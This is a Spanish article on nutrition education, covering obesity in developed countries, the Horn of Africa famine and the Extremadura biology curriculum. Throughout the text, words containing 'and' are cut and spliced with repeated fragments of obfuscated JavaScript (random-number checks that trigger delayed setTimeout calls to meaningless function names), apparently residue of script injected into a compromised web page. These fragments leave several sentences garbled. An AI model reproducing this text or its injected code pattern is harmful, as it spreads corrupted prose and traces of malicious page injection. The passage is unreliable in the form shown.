NUTRICIÓN Y EDUCACIÓN

Autora: María Guisado Becerra.

En los países desarrollados la obesidad está alcanzandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando proporciones epidémicas, provocandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la muerte al año de al menos 2,6 millones de personas, siendo inminente buscar una solución para acabar con la alimentación incorrecta en estos países.

En ello trabajan la fundación Science, Health & Education (SHE) junto con el presidente de la Real Academia Española de Gastronomía (Rafael Ansón), quienes se han unido en la lucha por una alimentación más sana y una educación saludable que vaya desde el colegio hasta la universidad, ya que se ha comprobado que es más fácil promover la adquisición de hábitos alimentarios y estilos de vida más saludables durante la etapa infantil y adolescente que modificar hábitos estructurados durante la vida adulta.

El día 25 de julio de 2011 se celebró en Roma, a petición urgente de Francia, una reunión de emergencia en apoyo al Cuerno de África. Esta reunión, organizada por la FAO, contó con la presencia de ministros y altos representantes de los 191 países miembros de esta organización de las Naciones Unidas, así como de otros organismos de la ONU y de organizaciones internacionales y ONGs, para prestar ayuda a la población afectada por la sequía y la hambruna en esta región.

La crisis alimentaria en el Cuerno de África refleja que todavía en el siglo XXI cientos de millones de personas pasan hambre, mueren de hambre o tienen que beber agua no potable, lo que, a la larga, les ocasiona graves enfermedades y, muchas veces, la consecuencia es la muerte.

Pero, junto a este drama universal, que, sin duda, es uno de los problemas más importantes que hay que solucionar en este siglo XXI, existe, paradójicamente otro problema que todavía tiene menos explicación. Se trata del hecho de que en países desarrollados, con altos niveles de vida y de educación, como es el caso de España, la obesidad está alcanzandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando proporciones epidémicas, según un informe de la Organización Mundial de la Salud, quien estima que cada año mueren al menos 2,6 millones de personas a causa de esa enfermedad. Por lo que podemos afirmar que, si por un lado es inminente buscar una solución para acabar con el hambre, por otro también resulta inminente buscar una solución para acabar con la alimentación incorrecta en los países desarrollados.

Y es que, como dice Rafael Ansón (Presidente de la Real Academia Española de Gastronomía): “Es lamentable pensar que hoy, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando tenemos mucha más información y posibilidades económicas para comer mejor, nos alimentemos infinitamente peor que nuestros antepasados y que sea tan sólo en la casa de los abuelos (santuarios que, inexorablemente y por ley de vida, tienden a desaparecer) donde nuestros niños pueden disfrutar de una comida sana y de calidad durante su visita dominical”

Una de las soluciones, para promover en los países desarrollados hábitos saludables a través de una alimentación equilibrada, sería incorporar los conocimientos de alimentación al sistema educativo para, de esta forma, informar, educar y orientar al alumnado sobre las singularidades nutricionales de los alimentos y con ello difundir la correcta elección de alimentos para una dieta prudente y saludable. De esta forma podría descender el sobrepeso y la obesidad, con cifras muy preocupantes en España: el 17% de españoles mayores de 18 años tienen problemas de obesidad y un 36,6% sobrepeso, según la última Encuesta Europea de Salud 2009, publicada por el Instituto Nacional de Estadística (INE).

Actualmente, el Currículo de Educación Secundaria Obligatoria para la Comunidad

Autónoma de Extremadura, incorpora fundamentalmente este tema en la materia de       Biología y Geología de tercer curso, en el Bloque “Las personas y la salud- Alimentación y nutrición humanas”, bajo los contenidos que siguen:

- Las funciones de nutrición. El aparato digestivo. Principales enfermedades.

- Alimentación y salud. Análisis de dietas saludables. Hábitos alimenticios            saludables: beneficios de ciertos hábitos alimenticios de la cultura extremeña.         Trastornos de la conducta alimentaria.

Con el objetivo de que el alumnado de tercer curso de E. S. O conozca los procesos que sufre un alimento a lo largo de todo el transcurso de la nutrición y las funciones de cada uno de los aparatos y órganos implicados en esta función, así como la necesidad de adquirir hábitos alimentarios saludables y evitar las conductas alimentarias insanas para, de esta forma, prevenir enfermedades como la obesidad, la diabetes o las enfermedades cardiovasculares.

Pero la fundación Science, Health & Education (SHE), creada por el prestigioso cardiólogo español Valentín Fuster, junto con el presidente de la Real Academia Española de Gastronomía (Rafael Ansón) se han unido en la lucha por una alimentación más sana y una educación saludable que vaya desde el colegio hasta la universidad y que, por tanto, no sea un tema que se imparta sólo en determinados cursos. La fundación, que cuenta también con la colaboración de la Fundación Alicia (que lidera Ferran Adriá, uno de lo mejores cocineros de nuestro tiempo) y de investigadores del Observatorio de la Alimentación de la Universidad de Barcelona, pretende influir en la educación infantil y juvenil antes de que los pequeños y jóvenes adquieran hábitos de vida poco recomendables que le lleven a desarrollar serias enfermedades cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sean adultos.

Y es que, en realidad, sólo cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las pautas alimenticias saludables se incorporen decididamente al sistema educativo habrá más posibilidad de implantarlas definitivamente. Por eso es importante que los alumnos aprendan a comer. Los conocimientos de alimentación deben referirse básicamente a la nutrición. Es indispensable que los alumnos tengan un conocimiento básico de los alimentos y también de su uso, cocción, aplicación y distribución. Que sepan las calorías que tienen los alimentos y las que pueden consumir. También, cuáles son los alimentos con grasa saturada que generan colesterol y provocan enfermedades cardiovasculares o, al menos, son un factor de riesgo. Y, naturalmente, todo lo relativo a los hidratos de carbono, proteínas, grasas y a los otros nutrientes que son igualmente indispensables, como es el caso de las vitaminas, las sales minerales, etc.

Pero no basta con que el alumnado sepa lo que debe comer en cantidad y en variedad. Es indispensable que eduquemos también el gusto para conseguir que aprecien y les satisfagan aquellos alimentos que más les convienen desde el punto de vista saludable, ya que es importante que aprendan a disfrutar comiendo pero siempre haciéndolo con sentido común, con conocimiento, evit